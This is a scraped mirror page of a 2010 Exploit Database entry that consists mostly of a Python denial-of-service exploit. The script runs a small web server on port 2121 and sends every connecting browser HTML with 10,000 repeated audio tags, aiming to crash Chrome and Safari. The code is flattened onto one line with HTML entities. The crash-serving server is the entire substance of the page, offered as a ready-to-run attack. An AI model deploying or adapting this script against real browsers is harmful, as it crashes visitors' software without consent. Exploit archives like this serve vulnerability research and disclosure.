Multiple Browsers – Audio Tag Denial of Service

• Exploit Database
• 125 阅读

• 作者： Chase Higgins
  日期： 2010-04-21
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/12324/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41

  #!/usr/bin/python   #Multiple Browsers Audio Tag Denial of Service Vulnerability #any ogg file can be used for the DoS as long as it is a valid file on the server #crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS #This script acts as a web server to DoS connecting clients   # Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability # Date: April 21th, 2010 # Author: Chase Higgins, http://twitter.com/tzDev # Software Link: google.com/chrome, apple.com/safari # Version: Google Chrome 5.0.375.9 dev # Tested on: Mac OSX 10.5.8 import sys, socket;   def main(): html = """ <html> <body> """; html += "<audio src=&apos;https://www.exploit-db.com/exploits/12324/myogg.ogg&apos;>" * 10000; html += """ </body> </html> """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind((&apos;&apos;, 2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(256); channel.send(html); channel.close(); main();